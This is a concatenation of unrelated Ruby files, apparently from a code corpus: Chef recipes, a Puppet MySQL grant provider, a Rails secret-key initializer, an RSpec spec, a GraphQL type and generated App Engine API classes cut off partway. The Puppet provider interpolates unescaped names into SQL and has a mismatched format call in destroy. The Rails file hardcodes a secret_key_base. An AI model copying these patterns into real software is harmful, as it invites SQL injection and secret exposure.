# Cookbook Name:: php
# Recipe:: module_xml
#
# Copyright 2009-2012, Panagiotis Papadomitsos
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
case node['platform_family']
when 'debian'
%w{ xmlrpc xsl }.each do |pkg|
package "php5-#{pkg}" do
action :install
end
end
when 'rhel', 'fedora'
%w{ xml xmlrpc }.each do |pkg|
package "php-#{pkg}" do
action :install
end
end
end
| 26.694444 | 74 | 0.707596 |
bf1e219804b846f749c5414410a0984fcae001f3
| 4,888 |
# Copyright 2011 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# A grant is either global or per-db. This can be distinguished by the syntax
# of the name:
# user@host => global
# user@host/db => per-db
require 'puppet/provider/package'
MYSQL_USER_PRIVS = [ :select_priv, :insert_priv, :update_priv, :delete_priv,
:create_priv, :drop_priv, :reload_priv, :shutdown_priv, :process_priv,
:file_priv, :grant_priv, :references_priv, :index_priv, :alter_priv,
:show_db_priv, :super_priv, :create_tmp_table_priv, :lock_tables_priv,
:execute_priv, :repl_slave_priv, :repl_client_priv, :create_view_priv,
:show_view_priv, :create_routine_priv, :alter_routine_priv,
:create_user_priv
]
MYSQL_DB_PRIVS = [ :select_priv, :insert_priv, :update_priv, :delete_priv,
:create_priv, :drop_priv, :grant_priv, :references_priv, :index_priv,
:alter_priv, :create_tmp_table_priv, :lock_tables_priv, :create_view_priv,
:show_view_priv, :create_routine_priv, :alter_routine_priv, :execute_priv
]
Puppet::Type.type(:mysql_grant).provide(:mysql) do
desc "Uses mysql as database."
commands :mysql => '/usr/bin/mysql'
commands :mysqladmin => '/usr/bin/mysqladmin'
def mysql_flush
mysqladmin "flush-privileges"
end
# this parses the
def split_name(string)
matches = /^([^@]*)@([^\/]*)(\/(.*))?$/.match(string).captures.compact
case matches.length
when 2
{
:type => :user,
:user => matches[0],
:host => matches[1]
}
when 4
{
:type => :db,
:user => matches[0],
:host => matches[1],
:db => matches[3]
}
end
end
def create_row
unless @resource.should(:privileges).empty?
name = split_name(@resource[:name])
case name[:type]
when :user
mysql "mysql", "-e", "INSERT INTO user (host, user) VALUES ('%s', '%s')" % [
name[:host], name[:user],
]
when :db
mysql "mysql", "-e", "INSERT INTO db (host, user, db) VALUES ('%s', '%s', '%s')" % [
name[:host], name[:user], name[:db],
]
end
mysql_flush
end
end
def destroy
mysql "mysql", "-e", "REVOKE ALL ON '%s'.* FROM '%s@%s'" % [ @resource[:privileges], @resource[:database], @resource[:name], @resource[:host] ]
end
def row_exists?
name = split_name(@resource[:name])
fields = [:user, :host]
if name[:type] == :db
fields << :db
end
not mysql( "mysql", "-NBe", 'SELECT "1" FROM %s WHERE %s' % [ name[:type], fields.map do |f| "%s = '%s'" % [f, name[f]] end.join(' AND ')]).empty?
end
def all_privs_set?
all_privs = case split_name(@resource[:name])[:type]
when :user
MYSQL_USER_PRIVS
when :db
MYSQL_DB_PRIVS
end
all_privs = all_privs.collect do |p| p.to_s end.sort.join("|")
privs = privileges.collect do |p| p.to_s end.sort.join("|")
all_privs == privs
end
def privileges
name = split_name(@resource[:name])
privs = ""
case name[:type]
when :user
privs = mysql "mysql", "-Be", 'select * from user where user="%s" and host="%s"' % [ name[:user], name[:host] ]
when :db
privs = mysql "mysql", "-Be", 'select * from db where user="%s" and host="%s" and db="%s"' % [ name[:user], name[:host], name[:db] ]
end
if privs.match(/^$/)
privs = [] # no result, no privs
else
# returns a line with field names and a line with values, each tab-separated
privs = privs.split(/\n/).map! do |l| l.chomp.split(/\t/) end
# transpose the lines, so we have key/value pairs
privs = privs[0].zip(privs[1])
privs = privs.select do |p| p[0].match(/_priv$/) and p[1] == 'Y' end
end
privs.collect do |p| symbolize(p[0].downcase) end
end
def privileges=(privs)
unless row_exists?
create_row
end
# puts "Setting privs: ", privs.join(", ")
name = split_name(@resource[:name])
stmt = ''
where = ''
all_privs = []
case name[:type]
when :user
stmt = 'update user set '
where = ' where user="%s" and host="%s"' % [ name[:user], name[:host] ]
all_privs = MYSQL_USER_PRIVS
when :db
stmt = 'update db set '
where = ' where user="%s" and host="%s"' % [ name[:user], name[:host] ]
all_privs = MYSQL_DB_PRIVS
end
if privs[0] == :all
privs = all_privs
end
# puts "stmt:", stmt
set = all_privs.collect do |p| "%s = '%s'" % [p, privs.include?(p) ? 'Y' : 'N'] end.join(', ')
# puts "set:", set
stmt = stmt << set << where
mysql "mysql", "-Be", stmt
mysql_flush
end
end
| 28.923077 | 148 | 0.63973 |
91501275b22a72a12185ab8bd96be000a8f88774
| 659 |
# Be sure to restart your server when you modify this file.
# Your secret key is used for verifying the integrity of signed cookies.
# If you change this key, all old signed cookies will become invalid!
# Make sure the secret is at least 30 characters and all random,
# no regular words or you'll be exposed to dictionary attacks.
# You can use `rake secret` to generate a secure secret key.
# Make sure your secret_key_base is kept private
# if you're sharing your code publicly.
Dummy::Application.config.secret_key_base = '5848a329518684b6079c5ad1450d459fd6f273f0804e39a0bc5d45e43624f8b7e06f11051184f75e14a8e7c980553a94897eabfabf61cbafb4a07e832fb5aa3e'
| 50.692308 | 174 | 0.814871 |
389e21f32f00928d792f2c023705b0504185fe4e
| 2,214 |
#
# Cookbook:: _pipeline
# Resource:: build_cookbook
#
# Copyright:: 2017, Nathan Cerny
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
resource_name 'build_cookbook'
default_action :create
property :name, String, name_property: true
property :cwd, String, required: true
property :git_branch, [Symbol, String], default: :master
alias :branch :git_branch
load_current_value do
# node.run_state['chef-users'] ||= Mixlib::ShellOut.new('chef-server-ctl user-list').run_command.stdout
# current_value_does_not_exist! unless node.run_state['chef-users'].index(/^#{username}$/)
end
action :create do
directory "#{new_resource.cwd}/.delivery/build_cookbook/recipes" do
recursive true
action :create
owner 'dbuild'
group 'dbuild'
end
%w(default deploy functional lint provision publish quality security smoke syntax unit).each do |phase|
template "#{new_resource.cwd}/.delivery/build_cookbook/recipes/#{phase}.rb" do
source 'recipe.erb'
owner 'dbuild'
group 'dbuild'
variables phase: phase
end
end
%w(chefignore LICENSE metadata.rb Berksfile).each do |f|
cookbook_file "#{new_resource.cwd}/.delivery/build_cookbook/#{f}" do
source f
owner 'dbuild'
group 'dbuild'
end
end
%w(config.json project.toml).each do |f|
cookbook_file "#{new_resource.cwd}/.delivery/#{f}" do
source f
owner 'dbuild'
group 'dbuild'
end
end
execute "#{new_resource.name} :: Commit build cookbook" do
command <<-EOF
git add .delivery
git commit -m 'Update Automate Workflow build_cookbook'
EOF
cwd "#{new_resource.cwd}/#{new_resource.name}"
only_if { new_resource.resource_updated? }
end
end
| 29.52 | 105 | 0.712285 |
26997923b3a533f4438e04d651128d2c1f6a0f9e
| 868 |
require 'spec_helper'
describe ABSTRACT(:refresh_token) do
it do
ABSTRACT(:refresh_token).table_name.should == ABSTRACT(:refresh_token_plur).to_s
end
describe 'basic refresh token instance' do
with :client
subject do
ABSTRACT(:refresh_token).create! ABSTRACT(:client_sym) => client
end
it { should validate_presence_of :token }
it { should validate_uniqueness_of :token }
it { should belong_to :user }
it { should belong_to ABSTRACT(:client_sym) }
it { should validate_presence_of ABSTRACT(:client_sym) }
it { should validate_presence_of :expires_at }
it { should have_many ABSTRACT(:access_token_plur) }
it { should have_db_index ABSTRACT(:client_sym_id) }
it { should have_db_index :user_id }
it { should have_db_index(:token).unique(true) }
it { should have_db_index :expires_at }
end
end
| 33.384615 | 84 | 0.718894 |
26f4736ebe5b6c3104d277b8756b6f89c3e033ee
| 151 |
Types::VideoType = GraphQL::ObjectType.define do
name "Video"
field :id, types.ID
field :title, types.String
field :watched, types.Boolean
end
| 21.571429 | 48 | 0.728477 |
6a2d8c496ffdb3194b1a31c4eab39c270bbc21ae
| 48,578 |
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module AppengineV1beta
class ApiConfigHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ApiEndpointHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Application
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AuthorizedCertificate
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AuthorizedDomain
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AutomaticScaling
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BasicScaling
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BatchUpdateIngressRulesRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BatchUpdateIngressRulesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BuildInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CertificateRawData
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CloudBuildOptions
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ContainerInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CpuUtilization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CreateVersionMetadataV1
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CreateVersionMetadataV1Alpha
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CreateVersionMetadataV1Beta
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CustomMetric
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class DebugInstanceRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Deployment
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class DiskUtilization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class DomainMapping
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Empty
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class EndpointsApiService
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Entrypoint
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ErrorHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FeatureSettings
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FileInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FirewallRule
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class HealthCheck
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class IdentityAwareProxy
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Instance
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Library
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListAuthorizedCertificatesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListAuthorizedDomainsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListDomainMappingsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListIngressRulesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListInstancesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListLocationsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListOperationsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListServicesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListVersionsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class LivenessCheck
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Location
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class LocationMetadata
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ManagedCertificate
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ManualScaling
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Network
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class NetworkUtilization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OAuth2ClientInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Operation
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadata
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadataV1
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadataV1Alpha
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadataV1Beta
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadataV1Beta5
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ReadinessCheck
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class RepairApplicationRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class RequestUtilization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ResourceRecord
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Resources
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ScriptHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Service
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class SslSettings
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class StandardSchedulerSettings
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class StaticFilesHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Status
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class TrafficSplit
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class UrlDispatchRule
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class UrlMap
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Version
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Volume
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class VpcAccessConnector
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ZipInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ApiConfigHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :auth_fail_action, as: 'authFailAction'
property :login, as: 'login'
property :script, as: 'script'
property :security_level, as: 'securityLevel'
property :url, as: 'url'
end
end
class ApiEndpointHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :script_path, as: 'scriptPath'
end
end
class Application
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :auth_domain, as: 'authDomain'
property :code_bucket, as: 'codeBucket'
property :default_bucket, as: 'defaultBucket'
property :default_cookie_expiration, as: 'defaultCookieExpiration'
property :default_hostname, as: 'defaultHostname'
collection :dispatch_rules, as: 'dispatchRules', class: Google::Apis::AppengineV1beta::UrlDispatchRule, decorator: Google::Apis::AppengineV1beta::UrlDispatchRule::Representation
property :feature_settings, as: 'featureSettings', class: Google::Apis::AppengineV1beta::FeatureSettings, decorator: Google::Apis::AppengineV1beta::FeatureSettings::Representation
property :gcr_domain, as: 'gcrDomain'
property :iap, as: 'iap', class: Google::Apis::AppengineV1beta::IdentityAwareProxy, decorator: Google::Apis::AppengineV1beta::IdentityAwareProxy::Representation
property :id, as: 'id'
property :location_id, as: 'locationId'
property :name, as: 'name'
property :serving_status, as: 'servingStatus'
end
end
class AuthorizedCertificate
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :certificate_raw_data, as: 'certificateRawData', class: Google::Apis::AppengineV1beta::CertificateRawData, decorator: Google::Apis::AppengineV1beta::CertificateRawData::Representation
property :display_name, as: 'displayName'
property :domain_mappings_count, as: 'domainMappingsCount'
collection :domain_names, as: 'domainNames'
property :expire_time, as: 'expireTime'
property :id, as: 'id'
property :managed_certificate, as: 'managedCertificate', class: Google::Apis::AppengineV1beta::ManagedCertificate, decorator: Google::Apis::AppengineV1beta::ManagedCertificate::Representation
property :name, as: 'name'
collection :visible_domain_mappings, as: 'visibleDomainMappings'
end
end
class AuthorizedDomain
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :id, as: 'id'
property :name, as: 'name'
end
end
class AutomaticScaling
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cool_down_period, as: 'coolDownPeriod'
property :cpu_utilization, as: 'cpuUtilization', class: Google::Apis::AppengineV1beta::CpuUtilization, decorator: Google::Apis::AppengineV1beta::CpuUtilization::Representation
collection :custom_metrics, as: 'customMetrics', class: Google::Apis::AppengineV1beta::CustomMetric, decorator: Google::Apis::AppengineV1beta::CustomMetric::Representation
property :disk_utilization, as: 'diskUtilization', class: Google::Apis::AppengineV1beta::DiskUtilization, decorator: Google::Apis::AppengineV1beta::DiskUtilization::Representation
property :max_concurrent_requests, as: 'maxConcurrentRequests'
property :max_idle_instances, as: 'maxIdleInstances'
property :max_pending_latency, as: 'maxPendingLatency'
property :max_total_instances, as: 'maxTotalInstances'
property :min_idle_instances, as: 'minIdleInstances'
property :min_pending_latency, as: 'minPendingLatency'
property :min_total_instances, as: 'minTotalInstances'
property :network_utilization, as: 'networkUtilization', class: Google::Apis::AppengineV1beta::NetworkUtilization, decorator: Google::Apis::AppengineV1beta::NetworkUtilization::Representation
property :request_utilization, as: 'requestUtilization', class: Google::Apis::AppengineV1beta::RequestUtilization, decorator: Google::Apis::AppengineV1beta::RequestUtilization::Representation
property :standard_scheduler_settings, as: 'standardSchedulerSettings', class: Google::Apis::AppengineV1beta::StandardSchedulerSettings, decorator: Google::Apis::AppengineV1beta::StandardSchedulerSettings::Representation
end
end
class BasicScaling
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :idle_timeout, as: 'idleTimeout'
property :max_instances, as: 'maxInstances'
end
end
class BatchUpdateIngressRulesRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :ingress_rules, as: 'ingressRules', class: Google::Apis::AppengineV1beta::FirewallRule, decorator: Google::Apis::AppengineV1beta::FirewallRule::Representation
end
end
class BatchUpdateIngressRulesResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :ingress_rules, as: 'ingressRules', class: Google::Apis::AppengineV1beta::FirewallRule, decorator: Google::Apis::AppengineV1beta::FirewallRule::Representation
end
end
class BuildInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cloud_build_id, as: 'cloudBuildId'
end
end
class CertificateRawData
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :private_key, as: 'privateKey'
property :public_certificate, as: 'publicCertificate'
end
end
class CloudBuildOptions
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :app_yaml_path, as: 'appYamlPath'
property :cloud_build_timeout, as: 'cloudBuildTimeout'
end
end
class ContainerInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :image, as: 'image'
end
end
class CpuUtilization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :aggregation_window_length, as: 'aggregationWindowLength'
property :target_utilization, as: 'targetUtilization'
end
end
class CreateVersionMetadataV1
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cloud_build_id, as: 'cloudBuildId'
end
end
class CreateVersionMetadataV1Alpha
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cloud_build_id, as: 'cloudBuildId'
end
end
class CreateVersionMetadataV1Beta
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cloud_build_id, as: 'cloudBuildId'
end
end
class CustomMetric
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :filter, as: 'filter'
property :metric_name, as: 'metricName'
property :single_instance_assignment, as: 'singleInstanceAssignment'
property :target_type, as: 'targetType'
property :target_utilization, as: 'targetUtilization'
end
end
class DebugInstanceRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :ssh_key, as: 'sshKey'
end
end
class Deployment
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :build, as: 'build', class: Google::Apis::AppengineV1beta::BuildInfo, decorator: Google::Apis::AppengineV1beta::BuildInfo::Representation
property :cloud_build_options, as: 'cloudBuildOptions', class: Google::Apis::AppengineV1beta::CloudBuildOptions, decorator: Google::Apis::AppengineV1beta::CloudBuildOptions::Representation
property :container, as: 'container', class: Google::Apis::AppengineV1beta::ContainerInfo, decorator: Google::Apis::AppengineV1beta::ContainerInfo::Representation
hash :files, as: 'files', class: Google::Apis::AppengineV1beta::FileInfo, decorator: Google::Apis::AppengineV1beta::FileInfo::Representation
property :zip, as: 'zip', class: Google::Apis::AppengineV1beta::ZipInfo, decorator: Google::Apis::AppengineV1beta::ZipInfo::Representation
end
end
class DiskUtilization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :target_read_bytes_per_second, as: 'targetReadBytesPerSecond'
property :target_read_ops_per_second, as: 'targetReadOpsPerSecond'
property :target_write_bytes_per_second, as: 'targetWriteBytesPerSecond'
property :target_write_ops_per_second, as: 'targetWriteOpsPerSecond'
end
end
class DomainMapping
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :id, as: 'id'
property :name, as: 'name'
collection :resource_records, as: 'resourceRecords', class: Google::Apis::AppengineV1beta::ResourceRecord, decorator: Google::Apis::AppengineV1beta::ResourceRecord::Representation
property :ssl_settings, as: 'sslSettings', class: Google::Apis::AppengineV1beta::SslSettings, decorator: Google::Apis::AppengineV1beta::SslSettings::Representation
end
end
class Empty
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class EndpointsApiService
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :config_id, as: 'configId'
property :disable_trace_sampling, as: 'disableTraceSampling'
property :name, as: 'name'
property :rollout_strategy, as: 'rolloutStrategy'
end
end
class Entrypoint
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :shell, as: 'shell'
end
end
class ErrorHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :error_code, as: 'errorCode'
property :mime_type, as: 'mimeType'
property :static_file, as: 'staticFile'
end
end
class FeatureSettings
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :split_health_checks, as: 'splitHealthChecks'
property :use_container_optimized_os, as: 'useContainerOptimizedOs'
end
end
class FileInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :mime_type, as: 'mimeType'
property :sha1_sum, as: 'sha1Sum'
property :source_url, as: 'sourceUrl'
end
end
class FirewallRule
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :action, as: 'action'
property :description, as: 'description'
property :priority, as: 'priority'
property :source_range, as: 'sourceRange'
end
end
class HealthCheck
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :check_interval, as: 'checkInterval'
property :disable_health_check, as: 'disableHealthCheck'
property :healthy_threshold, as: 'healthyThreshold'
property :host, as: 'host'
property :restart_threshold, as: 'restartThreshold'
property :timeout, as: 'timeout'
property :unhealthy_threshold, as: 'unhealthyThreshold'
end
end
class IdentityAwareProxy
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :enabled, as: 'enabled'
property :oauth2_client_id, as: 'oauth2ClientId'
property :oauth2_client_info, as: 'oauth2ClientInfo', class: Google::Apis::AppengineV1beta::OAuth2ClientInfo, decorator: Google::Apis::AppengineV1beta::OAuth2ClientInfo::Representation
property :oauth2_client_secret, as: 'oauth2ClientSecret'
property :oauth2_client_secret_sha256, as: 'oauth2ClientSecretSha256'
end
end
class Instance
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :app_engine_release, as: 'appEngineRelease'
property :availability, as: 'availability'
property :average_latency, as: 'averageLatency'
property :errors, as: 'errors'
property :id, as: 'id'
property :memory_usage, :numeric_string => true, as: 'memoryUsage'
property :name, as: 'name'
property :qps, as: 'qps'
property :requests, as: 'requests'
property :start_time, as: 'startTime'
property :vm_debug_enabled, as: 'vmDebugEnabled'
property :vm_id, as: 'vmId'
property :vm_ip, as: 'vmIp'
property :vm_name, as: 'vmName'
property :vm_status, as: 'vmStatus'
property :vm_zone_name, as: 'vmZoneName'
end
end
class Library
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :name, as: 'name'
property :version, as: 'version'
end
end
class ListAuthorizedCertificatesResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :certificates, as: 'certificates', class: Google::Apis::AppengineV1beta::AuthorizedCertificate, decorator: Google::Apis::AppengineV1beta::AuthorizedCertificate::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListAuthorizedDomainsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :domains, as: 'domains', class: Google::Apis::AppengineV1beta::AuthorizedDomain, decorator: Google::Apis::AppengineV1beta::AuthorizedDomain::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListDomainMappingsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :domain_mappings, as: 'domainMappings', class: Google::Apis::AppengineV1beta::DomainMapping, decorator: Google::Apis::AppengineV1beta::DomainMapping::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListIngressRulesResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :ingress_rules, as: 'ingressRules', class: Google::Apis::AppengineV1beta::FirewallRule, decorator: Google::Apis::AppengineV1beta::FirewallRule::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListInstancesResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :instances, as: 'instances', class: Google::Apis::AppengineV1beta::Instance, decorator: Google::Apis::AppengineV1beta::Instance::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListLocationsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :locations, as: 'locations', class: Google::Apis::AppengineV1beta::Location, decorator: Google::Apis::AppengineV1beta::Location::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListOperationsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :next_page_token, as: 'nextPageToken'
collection :operations, as: 'operations', class: Google::Apis::AppengineV1beta::Operation, decorator: Google::Apis::AppengineV1beta::Operation::Representation
end
end
class ListServicesResponse
# @private
